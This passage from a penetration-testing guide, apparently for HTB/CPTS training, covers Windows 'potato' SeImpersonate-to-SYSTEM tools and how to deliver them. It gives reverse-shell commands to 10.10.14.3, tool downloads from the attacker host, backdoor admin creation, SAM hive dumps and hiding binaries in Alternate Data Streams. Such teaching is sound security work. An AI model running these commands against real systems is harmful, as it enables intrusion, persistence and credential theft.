potato-attacks-guide.md (46699B)
1 --- 2 title: "Potato Attacks — SeImpersonate to SYSTEM" 3 description: "Windows SeImpersonate → SYSTEM with the whole potato family (PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, SweetPotato): what each abuses, every useful flag, delivery from MSSQL/IIS/WinRM, and a repeatable field method with an HTB Jeeves worked example." 4 category: pentest-workflow 5 subcategory: "Companion Guides" 6 order: 25 7 tags: ["htb", "cpts", "windows", "privilege-escalation", "token-impersonation", "seimpersonate", "potato", "printspoofer", "godpotato", "juicypotatong", "roguepotato", "efspotato", "sweetpotato", "pentest-workflow"] 8 tools: ["PrintSpoofer", "GodPotato", "JuicyPotatoNG", "RoguePotato", "EfsPotato", "SweetPotato", "socat", "xp_cmdshell"] 9 difficulty: advanced 10 updated: "2026-09-17" 11 source: "vault:PrivEsc/PrivEsc - Windows.md (Token Manipulation & Potato Attacks)" 12 --- 13 14 [← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/privilege-escalation) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [Alternate Data Streams guide →](/sheets/pentest-workflow/alternate-data-streams-guide) 15 16 # Potato Attacks — SeImpersonate to SYSTEM `fas:ClipboardList` 17 18 > [!dashboard] What this is 19 > The long-form companion to the potato line in the [Windows Privilege Escalation cheat sheet](/sheets/pentest-workflow/privilege-escalation). The cheat sheet gives you the one-liner mid-box; this guide explains *what each potato actually abuses*, walks every useful flag, and shows how to deliver them from an MSSQL shell / IIS web shell / WinRM. Once you land SYSTEM, pair it with the [Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide) — staging the binary off a directory listing, stripping Mark-of-the-Web, and finding data (including flags) other users hid in a stream. 20 21 Almost every service account on Windows — `IIS APPPOOL\*`, `NT SERVICE\MSSQLSERVER`, `LOCAL SERVICE`, `NETWORK SERVICE`, and most third-party service accounts — holds **`SeImpersonatePrivilege`**. That one privilege is the whole game. If you land a shell as one of these accounts (a web shell, `xp_cmdshell`, a cracked service credential), a potato turns it into `NT AUTHORITY\SYSTEM` in a single command. The potatoes differ only in *how they trick SYSTEM into authenticating to something you control* so you can steal its token. 22 23 ## The gate check — do you even have a potato path? `fas:Terminal` 24 25 Everything here lives or dies on one line. Run it first, every time: 26 27 ```batch 28 whoami /priv 29 ``` 30 31 You are looking for either of these in the **Enabled** state: 32 33 | Privilege | What it lets you do | Who usually has it | 34 |---|---|---| 35 | `SeImpersonatePrivilege` | Impersonate a client after it authenticates to you | IIS AppPool, MSSQL, `LOCAL SERVICE`, `NETWORK SERVICE`, most service accounts | 36 | `SeAssignPrimaryTokenPrivilege` | Assign a primary token to a new process | Some service accounts, scheduled-task contexts | 37 38 > [!warning]+ No privilege, no potato 39 > `fas:TriangleExclamation` 40 > If `whoami /priv` shows neither privilege (or shows them **Disabled** with no way to enable them), the potato family is a dead end — go back to the [Windows PrivEsc cheat sheet](/sheets/pentest-workflow/privilege-escalation) for services, registry, credential hunting, and kernel paths. A privilege that is present but *Disabled* is fine: potatoes enable it themselves at runtime through the token they steal. 41 42 ### How a potato works (the shared skeleton) 43 44 Every tool below follows the same three beats. Only step 1 changes between them. 45 46 <figure class="flow plate corners"> 47 <figcaption class="flow__cap"><span class="flow__kind">The potato pattern — four beats</span><span class="flow__dir">LR</span></figcaption> 48 <div class="flow__body"> 49 <div class="flow__diagram" data-dir="lr"> 50 <div class="flow-rank"><div class="flow-node is-entry">1 · Coerce SYSTEM to authenticate<span class="sub">to a listener you control</span><span class="sub">(Spooler pipe / DCOM OXID / EFS RPC)</span></div></div> 51 <div class="flow-edge"></div> 52 <div class="flow-rank"><div class="flow-node">2 · Catch the auth and negotiate<span class="sub">a SYSTEM security context</span><span class="sub">(NTLM / SSPI)</span></div></div> 53 <div class="flow-edge"></div> 54 <div class="flow-rank"><div class="flow-node">3 · Impersonate the SYSTEM token<span class="sub">(needs SeImpersonate)</span></div></div> 55 <div class="flow-edge"></div> 56 <div class="flow-rank"><div class="flow-node is-goal">4 · CreateProcessWithToken / AsUser<span class="sub">→ your command runs as SYSTEM</span></div></div> 57 </div> 58 </div> 59 </figure> 60 61 The named difference — Print Spooler bug, DCOM/RPC OXID resolver, MS-EFSR — is just *the coercion trick in step 1*. When one is patched or disabled, you switch tools, not techniques. 62 63 > [!success]+ Grab the binaries — checksum-verified, offline mirror 64 > `fas:Toolbox` 65 > Mirrored on this site (self-hosted, no third-party fetch). Verify the hash before you run anything you pulled off the internet on a client box: 66 > - **PrintSpoofer:** [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) 67 > - **GodPotato (.NET 4.x):** [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) 68 > - **GodPotato (.NET 3.5):** [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc)) 69 > - **JuicyPotato (legacy):** [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) 70 > - **SweetPotato:** [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)) 71 > - **nc64.exe** (reverse-shell stand-in): [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc)) 72 > 73 > Not yet mirrored here — pull from source and rebuild/verify yourself: [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato). 74 75 --- 76 77 ## Which potato, when? `fas:Route` 78 79 Confirm the build first — `[environment]::OSVersion.Version` (PowerShell) or `ver` (cmd) — then work down this list. The order is "most reliable / least noisy" first. 80 81 | Tool | Coercion primitive | Needs | Works on | Reach for it when | 82 |---|---|---|---|---| 83 | **PrintSpoofer** | Print Spooler named pipe (`\pipe\spoolss`) | SeImpersonate **+ Spooler service running** | Win10 / Server 2016–2019 (and later where Spooler is up) | First choice — one binary, no network, interactive shell. | 84 | **GodPotato** | DCOM/RPC OXID resolver (local) | SeImpersonate, matching .NET runtime | Server 2012–2022, Win8–11 | Spooler is disabled/absent (common on Server 2019+/Win11). Broadest coverage — try it first if unsure. | 85 | **JuicyPotatoNG** | DCOM with a working CLSID + local SSPI on port 10247 | SeImpersonate | Win10 / Server 2016–2022 (pre-patch) | You want the classic JuicyPotato technique revived on a modern build; PrintSpoofer/GodPotato both failed. | 86 | **RoguePotato** | Remote OXID resolver via a redirector on port 135 | SeImpersonate + outbound/redirected 135 | Server 2019 / Win10 1809+ | DCOM is usable but you need the fake OXID trick; you can stand up a `socat` redirector. | 87 | **EfsPotato** | MS-EFSR (EFS RPC) local coercion | SeImpersonate or SeAssignPrimaryToken | Modern builds; multiple RPC interfaces to dodge patches | Great from `xp_cmdshell` / web shells; small, self-contained, swaps RPC pipes when one is patched. | 88 | **SweetPotato** | Bundles several (EfsRpc, PrintSpoofer, RottenPotato, DCOM) | SeImpersonate | Modern builds | You want one binary with a fallback `-e` selector; good "if this fails, switch mode" tool. | 89 90 <figure class="flow plate corners"> 91 <figcaption class="flow__cap"><span class="flow__kind">Which potato? — a fallback ladder</span><span class="flow__dir">TD</span></figcaption> 92 <div class="flow__body"> 93 <svg class="flow-svg" viewBox="0 0 630 720" role="img" aria-label="Decision tree for choosing a potato privilege-escalation tool, falling through PrintSpoofer, GodPotato, SweetPotato, JuicyPotatoNG and RoguePotato as each fails"> 94 <path class="fedge" d="M360,90 L360,150" marker-end="url(#flow-arrow)" /> 95 <path class="fedge" d="M300,90 L300,120 L120,120 L120,150" marker-end="url(#flow-arrow)" /> 96 <path class="fedge" d="M300,210 L300,240 L120,240 L120,270" marker-end="url(#flow-arrow)" /> 97 <path class="fedge" d="M420,210 L420,240 L470,240 L470,270" marker-end="url(#flow-arrow)" /> 98 <path class="fedge is-back" d="M235,300 L355,300" marker-end="url(#flow-arrow)" /> 99 <path class="fedge is-back" d="M470,330 L470,390" marker-end="url(#flow-arrow)" /> 100 <path class="fedge is-back" d="M470,450 L470,510" marker-end="url(#flow-arrow)" /> 101 <path class="fedge is-back" d="M470,570 L470,630" marker-end="url(#flow-arrow)" /> 102 <g class="fnode is-decision"><rect class="fnode__box" x="245" y="30" width="230" height="60" /><text class="fnode__label" x="360" y="48" text-anchor="middle">whoami /priv:<tspan class="sub" x="360" dy="14">SeImpersonate or</tspan><tspan class="sub" x="360" dy="14">SeAssignPrimaryToken?</tspan></text></g> 103 <g class="fnode is-note"><rect class="fnode__box" x="5" y="150" width="230" height="60" /><text class="fnode__label" x="120" y="176" text-anchor="middle">Not a potato box —<tspan class="sub" x="120" dy="15">services / registry / creds / kernel</tspan></text></g> 104 <g class="fnode is-decision"><rect class="fnode__box" x="245" y="150" width="230" height="60" /><text class="fnode__label" x="360" y="176" text-anchor="middle">Print Spooler<tspan class="sub" x="360" dy="15">service running?</tspan></text></g> 105 <g class="fnode"><rect class="fnode__box" x="5" y="270" width="230" height="60" /><text class="fnode__label" x="120" y="296" text-anchor="middle">PrintSpoofer<tspan class="sub" x="120" dy="15">(interactive SYSTEM shell)</tspan></text></g> 106 <g class="fnode"><rect class="fnode__box" x="355" y="270" width="230" height="60" /><text class="fnode__label" x="470" y="296" text-anchor="middle">GodPotato<tspan class="sub" x="470" dy="15">(pick NET4 / NET35 by runtime)</tspan></text></g> 107 <g class="fnode"><rect class="fnode__box" x="355" y="390" width="230" height="60" /><text class="fnode__label" x="470" y="416" text-anchor="middle">SweetPotato -e EfsRpc<tspan class="sub" x="470" dy="15">or EfsPotato (swap RPC pipe)</tspan></text></g> 108 <g class="fnode"><rect class="fnode__box" x="355" y="510" width="230" height="60" /><text class="fnode__label" x="470" y="536" text-anchor="middle">JuicyPotatoNG<tspan class="sub" x="470" dy="15">(-s to seek a CLSID)</tspan></text></g> 109 <g class="fnode"><rect class="fnode__box" x="355" y="630" width="230" height="60" /><text class="fnode__label" x="470" y="656" text-anchor="middle">RoguePotato<tspan class="sub" x="470" dy="15">(+ socat :135 redirector)</tspan></text></g> 110 <g class="felabel"><rect class="felabel__box" x="343" y="112" width="34" height="16" /><text class="felabel__text" x="360" y="123" text-anchor="middle">Yes</text></g> 111 <g class="felabel"><rect class="felabel__box" x="197" y="112" width="26" height="16" /><text class="felabel__text" x="210" y="123" text-anchor="middle">No</text></g> 112 <g class="felabel"><rect class="felabel__box" x="193" y="232" width="34" height="16" /><text class="felabel__text" x="210" y="243" text-anchor="middle">Yes</text></g> 113 <g class="felabel"><rect class="felabel__box" x="432" y="232" width="26" height="16" /><text class="felabel__text" x="445" y="243" text-anchor="middle">No</text></g> 114 <g class="felabel"><rect class="felabel__box" x="274" y="292" width="42" height="16" /><text class="felabel__text" x="295" y="303" text-anchor="middle">fails</text></g> 115 <g class="felabel"><rect class="felabel__box" x="449" y="352" width="42" height="16" /><text class="felabel__text" x="470" y="363" text-anchor="middle">fails</text></g> 116 <g class="felabel"><rect class="felabel__box" x="449" y="472" width="42" height="16" /><text class="felabel__text" x="470" y="483" text-anchor="middle">fails</text></g> 117 <g class="felabel"><rect class="felabel__box" x="395" y="592" width="150" height="16" /><text class="felabel__text" x="470" y="603" text-anchor="middle">DCOM blocked outbound</text></g> 118 </svg> 119 </div> 120 </figure> 121 122 --- 123 124 ## PrintSpoofer `fas:Terminal` 125 126 **Abuses:** the Print Spooler service. PrintSpoofer coerces `spoolsv.exe` (running as SYSTEM) to connect back to a named pipe it controls, then impersonates the SYSTEM token off that pipe. No network egress, no DCOM — everything happens over local IPC. 127 128 **Requirements:** `SeImpersonatePrivilege` **and** the Print Spooler service running (`sc query spooler` → `RUNNING`). On many Server 2019+/Win11 builds the Spooler is disabled by default post-PrintNightmare — that is your cue to switch to GodPotato. 129 130 ```batch 131 :: Interactive SYSTEM shell in your current console — the go-to 132 PrintSpoofer64.exe -i -c cmd 133 134 :: Fire a single command as SYSTEM (non-interactive) 135 PrintSpoofer64.exe -c "whoami" 136 PrintSpoofer64.exe -c "net localgroup administrators lowpriv /add" 137 138 :: Reverse shell back to your handler (catch with: nc -lnvp 8443) 139 PrintSpoofer64.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" 140 141 :: Spawn on a specific logon session (e.g. pop a shell on an RDP user's desktop) 142 PrintSpoofer64.exe -d 1 -c cmd 143 ``` 144 145 | Flag | Meaning | 146 |---|---| 147 | `-c <CMD>` | Command to run as SYSTEM (wrap in quotes; use `cmd /c ...` for shell built-ins) | 148 | `-i` | Interact with the new process in the **current** console — this is what gives you a live SYSTEM shell | 149 | `-d <SESSION_ID>` | Create the process in the given logon session / desktop (see `query session`) | 150 | `-p <PROGRAM>` | Program to launch (default `C:\Windows\System32\cmd.exe`) | 151 | `-h` | Help | 152 153 > [!tip]+ Everything PrintSpoofer can do 154 > `fas:Lightbulb` 155 > Anything `cmd`/a program can do, now as SYSTEM: pop an interactive shell (`-i -c cmd`), run one command (`-c`), throw a reverse shell, add a local admin, launch a Meterpreter/Sliver stager, read `C:\Windows\System32\config\SAM`, or spawn on another user's desktop with `-d`. It does **not** need outbound network — ideal on segmented internal hosts where DCOM/135 is filtered. 156 157 --- 158 159 ## GodPotato `fas:Terminal` 160 161 **Abuses:** DCOM. GodPotato stands up a local fake OXID resolver and drives a DCOM activation so a SYSTEM RPC context authenticates to it, then impersonates. It is the broadest-coverage modern potato — **Server 2012 through 2022, Windows 8 through 11** — and needs no Print Spooler. 162 163 **Requirements:** `SeImpersonatePrivilege` and a matching .NET runtime. Pick the binary by what is installed: `GodPotato-NET4.exe` for .NET 4.x (the common case), `GodPotato-NET35.exe` when only .NET 2.0/3.5 is present. Check with `dir %WINDIR%\Microsoft.NET\Framework\`. 164 165 ```batch 166 :: Prove it — run whoami as SYSTEM 167 GodPotato-NET4.exe -cmd "cmd /c whoami" 168 169 :: Add a local admin / new user 170 GodPotato-NET4.exe -cmd "cmd /c net user backdoor P@ssw0rd123! /add" 171 GodPotato-NET4.exe -cmd "cmd /c net localgroup administrators backdoor /add" 172 173 :: Reverse shell (catch with nc -lnvp 8443) 174 GodPotato-NET4.exe -cmd "cmd /c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" 175 176 :: .NET 3.5-only host 177 GodPotato-NET35.exe -cmd "cmd /c whoami" 178 ``` 179 180 | Flag | Meaning | 181 |---|---| 182 | `-cmd <COMMAND>` | Command to execute as SYSTEM (prefix with `cmd /c` for built-ins like `whoami`, `net`, `type`) | 183 | `-rpc_port <PORT>` | Pin the internal RPC listener port (default is chosen automatically; set it if a port collides) | 184 | `-h` | Help | 185 186 > [!tip]+ Everything GodPotato can do 187 > `fas:Lightbulb` 188 > Single-shot command execution as SYSTEM with the widest OS coverage of the family and **no Spooler and no external network** required. Use it to run a reverse shell, add an admin, dump hives, or kick off a C2 stager. Because it is fully local it is the reliable fallback whenever PrintSpoofer's Spooler dependency isn't met. It runs one command per invocation, so for a shell, have it launch `nc64.exe` or a stager rather than expecting an interactive prompt. 189 190 --- 191 192 ## JuicyPotatoNG `fas:Terminal` 193 194 **Abuses:** DCOM, like the original JuicyPotato, but revived for modern Windows. It uses a CLSID that still resolves for service accounts and negotiates the SYSTEM context locally over SSPI on a fixed port (default **10247**), sidestepping the 2018 DCOM hardening that killed classic JuicyPotato. 195 196 **Requirements:** `SeImpersonatePrivilege`. Works on Windows 10 / Server 2016–2022 depending on patch level. Not bundled here — build from [source](https://github.com/antonioCoco/JuicyPotatoNG). 197 198 ```batch 199 :: Default run — uses a built-in working CLSID and port 10247, runs cmd 200 JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" 201 202 :: Reverse shell 203 JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" 204 205 :: Let it seek a usable CLSID for this exact build 206 JuicyPotatoNG.exe -s -p "C:\Windows\System32\cmd.exe" -a "/c whoami" 207 208 :: Custom COM listen port if 10247 is taken 209 JuicyPotatoNG.exe -t * -l 10999 -p cmd.exe -a "/c whoami" 210 ``` 211 212 | Flag | Meaning | 213 |---|---| 214 | `-t <a\|u\|*>` | Token-creation call: `u` = `CreateProcessWithTokenW` (needs SeImpersonate), `a` = `CreateProcessAsUser` (needs SeAssignPrimaryToken), `*` = try both | 215 | `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | 216 | `-a <ARGS>` | Arguments passed to the program (e.g. `"/c whoami"`) | 217 | `-l <PORT>` | Local COM server listen port (default `10247`) | 218 | `-c <CLSID>` | Use a specific CLSID instead of the built-in default | 219 | `-s` | Seek — probe for a CLSID that works on this host | 220 | `-b` | Bruteforce all CLSIDs (loud; last resort) | 221 | `-i` | Interactive (run the program in the current console) | 222 223 > [!info]+ JuicyPotatoNG vs. the legacy JuicyPotato 224 > `fas:Lightbulb` 225 > The bundled [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) is the **legacy** tool — dead on Server 2019 / Windows 10 1809 and later because of DCOM hardening; keep it only for Server 2016-and-older targets (`JuicyPotato.exe -l 53375 -p cmd.exe -a "/c whoami" -t *`, needs a CLSID matching the OS). **JuicyPotatoNG** is the modern rewrite that works past that hardening. If you're on anything current, use NG, not the legacy binary. 226 227 --- 228 229 ## RoguePotato `fas:Terminal` 230 231 **Abuses:** DCOM with a *remote* OXID resolver. RoguePotato forces the DCOM OXID resolution to go out to TCP **135** on a host you control, which redirects it back to a local listener — letting you complete the SYSTEM NTLM negotiation on builds where the fully-local trick doesn't fire. 232 233 **Requirements:** `SeImpersonatePrivilege`, and the ability to reach an attacker-controlled resolver on port 135 (you run a `socat` redirector). This is the one potato with a network dependency. Not bundled here — build from [source](https://github.com/antonioCoco/RoguePotato). 234 235 ```bash 236 # On YOUR box: redirect victim's 135 back to its RoguePotato listener (default 9999) 237 socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 238 ``` 239 240 ```batch 241 :: On the victim: -r = your redirector IP, -l = local OXID listener, -e = command 242 RoguePotato.exe -r 10.10.14.3 -e "cmd.exe /c whoami > C:\Windows\Temp\r.txt" -l 9999 243 244 :: Reverse shell variant 245 RoguePotato.exe -r 10.10.14.3 -e "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -l 9999 246 ``` 247 248 | Flag | Meaning | 249 |---|---| 250 | `-r <IP>` | Remote OXID resolver IP — your box running the `socat` redirect on 135 | 251 | `-e <COMMAND>` | Command to execute as SYSTEM | 252 | `-l <PORT>` | Local fake OXID resolver listen port (default `9999`; must match the `socat` target) | 253 | `-c <CLSID>` | Specific CLSID to activate | 254 | `-p <PIPE>` | Named pipe to use (advanced) | 255 | `-z` | Test mode — check whether the technique will work without executing | 256 257 > [!warning]+ RoguePotato needs egress to port 135 258 > `fas:TriangleExclamation` 259 > If outbound/redirected 135 to your redirector is blocked (very common on segmented internal networks), RoguePotato can't complete. In that case fall back to a fully-local potato — GodPotato, EfsPotato, or SweetPotato's EfsRpc mode — which need no network at all. 260 261 --- 262 263 ## EfsPotato `fas:Terminal` 264 265 **Abuses:** MS-EFSR, the Encrypting File System Remote Protocol (the same RPC family as PetitPotam). EfsPotato coerces SYSTEM to authenticate to a local pipe via an EFS RPC call, then impersonates. It exposes **several RPC interfaces**, so when Microsoft patches one you switch to another with a single argument. 266 267 **Requirements:** `SeImpersonatePrivilege` **or** `SeAssignPrimaryTokenPrivilege`. It is tiny and self-contained, which makes it a favourite from `xp_cmdshell` and cramped web shells. Not bundled here — grab or compile from [source](https://github.com/zcgonvh/EfsPotato) (single `.cs`, buildable on-target with `csc.exe`). 268 269 ```batch 270 :: Simplest form — run a command as SYSTEM 271 EfsPotato.exe "whoami" 272 EfsPotato.exe "net user backdoor P@ssw0rd123! /add" 273 274 :: Pick a specific RPC pipe when the default is patched 275 :: valid pipes: lsarpc | efsrpc | samr | lsass | netlogon 276 EfsPotato.exe "whoami" lsarpc 277 EfsPotato.exe "whoami" efsrpc 278 279 :: Reverse shell 280 EfsPotato.exe "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" 281 ``` 282 283 ```powershell 284 # Compile on-target if you only have the .cs (no external toolchain needed) 285 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /nowarn:1691,618 EfsPotato.cs 286 ``` 287 288 | Argument | Meaning | 289 |---|---| 290 | `<command>` (1st positional) | Command to run as SYSTEM | 291 | `<pipe>` (2nd positional, optional) | RPC interface to abuse: `lsarpc`, `efsrpc`, `samr`, `lsass`, `netlogon` — rotate through these if the default is blocked/patched | 292 293 > [!tip]+ Everything EfsPotato can do 294 > `fas:Lightbulb` 295 > Fully local (no Spooler, no network), tiny, and compilable on-target — which is why it shines from MSSQL `xp_cmdshell` and low-footprint web shells. Its standout feature is the **swappable RPC pipe**: if `EfsPotato.exe "whoami"` fails because one interface is patched, retry with `lsarpc`, then `efsrpc`, then `samr`, etc. SweetPotato's `EfsRpc` mode is the same primitive wrapped in a bigger multi-tool. 296 297 --- 298 299 ## SweetPotato `fas:Terminal` 300 301 **Abuses:** whatever you select. SweetPotato bundles several coercion primitives behind a `-e` switch — commonly `EfsRpc` (default), `PrintSpoofer`, and `DCOM` (older/other forks also carry `RottenPotato`) — so a single binary carries built-in fallbacks. When one mode fails, change `-e` instead of uploading a new tool. The exact set depends on the fork; run `SweetPotato.exe -h` to see what your build exposes. 302 303 **Requirements:** `SeImpersonatePrivilege`. Modern builds. Bundled: [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)). 304 305 ```batch 306 :: Default (EfsRpc mode) — run a command as SYSTEM 307 SweetPotato.exe -a "/c whoami" 308 309 :: Force a specific technique 310 SweetPotato.exe -e EfsRpc -p C:\Windows\System32\cmd.exe -a "/c whoami" 311 SweetPotato.exe -e PrintSpoofer -p C:\Windows\System32\cmd.exe -a "/c whoami" 312 SweetPotato.exe -e DCOM -p C:\Windows\System32\cmd.exe -a "/c whoami" 313 314 :: Reverse shell 315 SweetPotato.exe -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" 316 ``` 317 318 | Flag | Meaning | 319 |---|---| 320 | `-e <EXPLOIT>` | Technique: `EfsRpc` (default), `PrintSpoofer`, `DCOM` (fork-dependent; some carry `RottenPotato`) | 321 | `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | 322 | `-a <ARGS>` | Arguments (e.g. `"/c whoami"`) | 323 | `-l <PORT>` | COM server listen port (for `DCOM`/`RottenPotato` modes) | 324 | `-c <CLSID>` | CLSID for DCOM-based modes | 325 326 > [!tip]+ Everything SweetPotato can do 327 > `fas:Lightbulb` 328 > It's the "one binary, several potatoes" option. Start with the default `EfsRpc`, and if it fails cycle `-e PrintSpoofer` (needs the Spooler) → `-e DCOM` → `-e RottenPotato`. Handy when you can only upload one file but don't know yet which primitive the target will accept. 329 330 --- 331 332 ## Delivery — getting a potato onto the box and running it `fas:RocketLaunch` 333 334 You rarely get a clean interactive prompt. These are the common contexts where you already hold a `SeImpersonate` account and how to drive a potato from each. Transfer methods (SMB, HTTP, `certutil`, `iwr`) are in [Foothold — File Transfers](/sheets/pentest-workflow/foothold-file-transfers). 335 336 ### From MSSQL `xp_cmdshell` 337 338 MSSQL service accounts almost always hold `SeImpersonate`. This is the classic MSSQL → SYSTEM chain. 339 340 ```sql 341 -- 1) enable xp_cmdshell 342 EXEC sp_configure 'show advanced options', 1; RECONFIGURE; 343 EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 344 345 -- 2) confirm the privilege 346 EXEC xp_cmdshell 'whoami /priv'; 347 348 -- 3) stage the potato (HTTP pull from your box) 349 EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.3/GodPotato-NET4.exe C:\Windows\Temp\g.exe'; 350 351 -- 4) fire it as SYSTEM 352 EXEC xp_cmdshell 'C:\Windows\Temp\g.exe -cmd "cmd /c net localgroup administrators sql_svc /add"'; 353 ``` 354 355 ### From an IIS / ASPX web shell 356 357 IIS AppPool identities hold `SeImpersonate` by design. From a web shell (`whoami` → `iis apppool\...`): 358 359 ```powershell 360 # Pull the tool, then run it — one command per web-shell request 361 Invoke-WebRequest -Uri http://10.10.14.3/PrintSpoofer64.exe -OutFile C:\Windows\Temp\ps.exe 362 C:\Windows\Temp\ps.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" 363 ``` 364 365 `C:\Windows\Temp` and `C:\Windows\System32\spool\drivers\color` are usually writable by the AppPool identity — good staging spots. See [Web Shells](/sheets/pentest-workflow/foothold-shells-payloads-metasploit) for the shell itself. 366 367 ### From WinRM / evil-winrm 368 369 ```bash 370 # On your box 371 evil-winrm -i 10.10.10.100 -u svc_web -p 'Password123!' 372 ``` 373 374 ```powershell 375 # Inside the session — upload is built into evil-winrm 376 upload /opt/tools/GodPotato-NET4.exe C:\Windows\Temp\g.exe 377 C:\Windows\Temp\g.exe -cmd "cmd /c whoami" 378 ``` 379 380 > [!tip]+ Interactive vs. one-shot potatoes 381 > `fas:Lightbulb` 382 > **PrintSpoofer** (`-i -c cmd`) and **JuicyPotatoNG** (`-i`) can hand you a *live* SYSTEM prompt. **GodPotato**, **EfsPotato**, **RoguePotato**, and **SweetPotato** run one command per invocation — so from those, have them launch `nc64.exe`/a C2 stager for your shell rather than expecting a prompt to appear. 383 384 ### SYSTEM payload cookbook 385 386 What to actually run once a potato lands you SYSTEM. Track every artefact you create for cleanup. 387 388 ```batch 389 :: Interactive shell (PrintSpoofer / JuicyPotatoNG) 390 ... -i -c cmd 391 392 :: Reverse shell (any potato) — nc -lnvp 8443 on your box 393 ... "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" 394 395 :: Local admin (loud, logged — prefer a shell/token over a new account on real engagements) 396 ... "cmd /c net user backdoor P@ssw0rd123! /add & net localgroup administrators backdoor /add" 397 398 :: Dump the SAM/SYSTEM hives for offline hash extraction 399 ... "cmd /c reg save HKLM\SAM C:\Windows\Temp\sam.sav /y & reg save HKLM\SYSTEM C:\Windows\Temp\sys.sav /y" 400 401 :: Stage a Meterpreter/Sliver/C2 beacon as SYSTEM 402 ... "cmd /c C:\Windows\Temp\beacon.exe" 403 404 :: Hide/find data with NTFS Alternate Data Streams — see the ADS guide, linked below 405 ... "cmd /c dir /r C:\Users\Administrator\Desktop" 406 ``` 407 408 Then pull the hives and crack offline: `impacket-secretsdump -sam sam.sav -system sys.sav LOCAL`. 409 410 > [!info]+ SYSTEM is also your ticket into Alternate Data Streams 411 > `fas:Lightbulb` 412 > Two uses, both worth knowing: **stage** the potato binary itself inside an ADS on a boring file (`type g.exe > log.txt:g.exe`) so a casual `dir` in `C:\Windows\Temp` shows nothing, then extract it back out right before you run it; and **find** data other users hid the same way — SYSTEM can now `dir /r` every profile on the box, and flags/creds/second-stage tooling turn up there more often than you'd expect. Full mechanics — reading, writing, finding, hiding, and stripping Mark-of-the-Web — are in the **[Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide)**. 413 414 --- 415 416 ## Field method — finding and landing a SeImpersonate → SYSTEM chain `fas:Route` 417 418 The potatoes are the easy part. The skill is the four steps *around* them: recognise that your shell holds impersonation rights, fingerprint the host so you pick a tool that actually fires on **this** build, get the binary across when the box has no download tools, then drive it non-interactively and read the result. Below is that method as a repeatable loop. A single awkward old box — HTB Jeeves, Windows 10 build 10586 — runs underneath as a case study, because the boxes where the *newest* potato fails are exactly the ones that teach you why fingerprinting matters. 419 420 <figure class="flow plate corners"> 421 <figcaption class="flow__cap"><span class="flow__kind">Run a potato — the loop</span><span class="flow__dir">TD</span></figcaption> 422 <div class="flow__body"> 423 <svg class="flow-svg" viewBox="0 0 790 700" role="img" aria-label="Enumerate privileges, pick a tool by OS era, transfer and fire it, check for SYSTEM; on failure switch tool and retry, on success move to SYSTEM recon"> 424 <path class="fedge" d="M300,90 L300,140" marker-end="url(#flow-arrow)" /> 425 <path class="fedge" d="M300,200 L300,250" marker-end="url(#flow-arrow)" /> 426 <path class="fedge" d="M300,310 L300,360" marker-end="url(#flow-arrow)" /> 427 <path class="fedge" d="M300,420 L300,470" marker-end="url(#flow-arrow)" /> 428 <path class="fedge" d="M300,530 L300,600" marker-end="url(#flow-arrow)" /> 429 <path class="fedge is-back" d="M425,500 L620,500 L620,200" marker-end="url(#flow-arrow)" /> 430 <path class="fedge is-back" d="M495,170 L427,170" marker-end="url(#flow-arrow)" /> 431 <g class="fnode is-entry"><rect class="fnode__box" x="175" y="30" width="250" height="60" /><text class="fnode__label" x="300" y="56" text-anchor="middle">1 · whoami /priv + /groups<tspan class="sub" x="300" dy="15">SeImpersonate? SERVICE token?</tspan></text></g> 432 <g class="fnode"><rect class="fnode__box" x="175" y="140" width="250" height="60" /><text 